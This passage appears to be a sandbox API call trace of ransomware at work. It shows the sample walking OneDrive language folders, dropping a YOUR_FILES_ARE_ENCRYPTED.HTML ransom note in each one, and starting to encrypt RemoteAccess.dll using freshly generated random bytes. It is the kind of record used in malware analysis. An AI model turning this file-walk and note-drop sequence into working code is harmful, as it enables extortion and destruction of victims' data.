ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.801] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cc25c4f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1cc25c4f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1f710191, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.801] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f710191, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1f710191, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1fe3748c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.801] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.801] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.801] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.801] lstrlenW (lpString=".mui") returned 4 [0113.801] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.801] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f710191, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1f710191, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1fe3748c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.801] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.801] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.801] GetProcessHeap () returned 0x600000 [0113.801] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\pt-br\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.801] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.803] CloseHandle (hObject=0x334) returned 1 [0113.803] GetProcessHeap () returned 0x600000 [0113.803] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.803] GetProcessHeap () returned 0x600000 [0113.803] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.803] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x215c2871, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x215c2871, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x215c2871, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0113.803] StrStrIW (lpFirst="pt-pt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.803] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt") returned 81 [0113.803] GetProcessHeap () returned 0x600000 [0113.803] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.803] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt" [0113.803] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt\\*" [0113.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x215c2871, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x215c2871, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x22862cea, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.804] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x215c2871, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x215c2871, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x22862cea, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.804] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22862cea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x22862cea, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2312d9e6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.804] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.804] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.804] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.804] lstrlenW (lpString=".mui") returned 4 [0113.804] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.804] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22862cea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x22862cea, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2312d9e6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.804] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.804] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.804] GetProcessHeap () returned 0x600000 [0113.804] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\pt-pt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.804] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.805] CloseHandle (hObject=0x334) returned 1 [0113.805] GetProcessHeap () returned 0x600000 [0113.805] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.805] GetProcessHeap () returned 0x600000 [0113.805] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.806] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2390227e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2390227e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2390227e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="qut-latn", cAlternateFileName="")) returned 1 [0113.806] StrStrIW (lpFirst="qut-latn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.806] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn") returned 84 [0113.806] GetProcessHeap () returned 0x600000 [0113.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.806] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn" [0113.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn\\*" [0113.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2390227e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2390227e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x251fc483, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.806] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2390227e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2390227e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x251fc483, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.806] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251fc483, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x251fc483, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x259bd4f8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x17ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.806] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.806] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn\\FileSync.LocalizedResources.dll.mui") returned 120 [0113.806] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.806] lstrlenW (lpString=".mui") returned 4 [0113.806] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.806] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251fc483, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x251fc483, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x259bd4f8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x17ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.806] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.806] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0113.806] GetProcessHeap () returned 0x600000 [0113.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\qut-latn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.807] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.808] CloseHandle (hObject=0x334) returned 1 [0113.808] GetProcessHeap () returned 0x600000 [0113.808] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.808] GetProcessHeap () returned 0x600000 [0113.808] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.809] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25ad31dc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x25ad31dc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x25ad31dc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="quz-pe", cAlternateFileName="")) returned 1 [0113.809] StrStrIW (lpFirst="quz-pe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.809] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe") returned 82 [0113.809] GetProcessHeap () returned 0x600000 [0113.809] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.810] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe" [0113.810] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe\\*" [0113.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25ad31dc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x25ad31dc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x25f77c72, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25ad31dc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x25ad31dc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x25f77c72, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f77c72, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x25f77c72, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262e4835, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.810] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.810] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe\\FileSync.LocalizedResources.dll.mui") returned 118 [0113.810] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.810] lstrlenW (lpString=".mui") returned 4 [0113.810] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f77c72, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x25f77c72, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262e4835, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.810] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.810] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0113.810] GetProcessHeap () returned 0x600000 [0113.810] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\quz-pe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.811] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.812] CloseHandle (hObject=0x334) returned 1 [0113.812] GetProcessHeap () returned 0x600000 [0113.812] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.812] GetProcessHeap () returned 0x600000 [0113.812] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.812] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14d0a816, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x14d0a816, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x16afe0f6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xa0ec0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="RemoteAccess.dll", cAlternateFileName="REMOTE~1.DLL")) returned 1 [0113.812] StrStrIW (lpFirst="RemoteAccess.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.812] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\RemoteAccess.dll") returned 92 [0113.812] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0113.812] lstrlenW (lpString=".dll") returned 4 [0113.812] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0113.812] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\RemoteAccess.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\remoteaccess.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0113.813] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=659136) returned 1 [0113.813] GetProcessHeap () returned 0x600000 [0113.813] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.814] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="86") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="41") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E5") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="B5") returned 